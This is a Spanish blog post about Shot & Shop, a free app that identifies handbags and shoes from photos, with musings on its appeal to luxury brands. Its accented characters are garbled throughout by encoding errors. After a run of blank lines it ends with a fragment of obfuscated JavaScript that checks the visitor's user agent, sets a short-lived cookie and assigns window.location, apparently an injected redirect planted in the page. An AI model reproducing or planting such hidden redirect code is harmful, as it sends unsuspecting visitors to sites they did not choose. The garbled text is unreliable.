Shot and Shop, la App que identifica la moda que vemos en la calle. A?Un aliado para el lujo?

 

Shot & Shop hace una sugerencia de modelos alternativos al que le hemos mostrado.
Shot & Shop hace una sugerencia de modelos alternativos al que le hemos mostrado.

La conocAi??amos esta semana. Shot & Shop es la nueva App queAi??logra identificar cualquier bolso y zapato que fotografiemos. Ha sido desarrollada por una ingeniera de Telecomunicaciones y experta en visiA?n artificial, la espaAi??ola Sira PAi??rez de la Coba, y es gratuita.

La aplicaciA?n es muy fA?cil de usar. Imaginemos que vamos por la calle y vemos a alguien con unas sandalias queAi?? nos gustan, pero nos da apuro preguntar dA?nde las ha adquirido. Lo A?nico que tenemos que hacer es entrar en la App, sacar una foto de las sandalias, subirla a la aplicaciA?n y Shot & Shop localiza ese artAi??culo en su base de datos, revela dA?nde se ha comprado, daAi??su precio y ademA?s nos permitirA? acceder a la tienda online de la marca y comprarlo si lo queremos.

En el caso de que la herramienta no encuentre exactamente el mismo producto, ofrece una relaciA?n de modelos alternativos que la App considera similares al buscado.

AdemA?s, la App te ayuda a hacer combinaciones de estilismos para sacar el mA?ximo partido a los complementos.

No, no es una App orientada al sector lujo, sino a moda en general. Pero sAi?? puede tener una interesante proyecciA?n paraAi??las firmas de alta gama.Ai??ParaAi??un consumidor de poder adquisitivo alto sin duda resulta atractiva la idea de que cualquiera, con solo sacar una foto de su bolso de marca, pueda saber dA?nde lo ha comprado y cuA?nto ha pagado por Ai??l.Ai?? Y ello sin necesidad deAi??exhibir ningA?n logo. A?QuAi?? mejor forma de hacer ostentaciA?n de la exclusividad sin que parezca que se estA? haciendo? Por eso las grandes marcas pueden tener un aliado en unaAi??aplicaciA?n de estas caracterAi??sticas.

Evidentemente, la eficacia del sistema dependerA? de una bien nutrida base de datos de productos donde los de lujo estAi??n debidamente representados y de que el sistema de identificaciA?n sea realmente eficaz.

A?TA? quAi?? crees?

 

 

 

 

 

  e\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}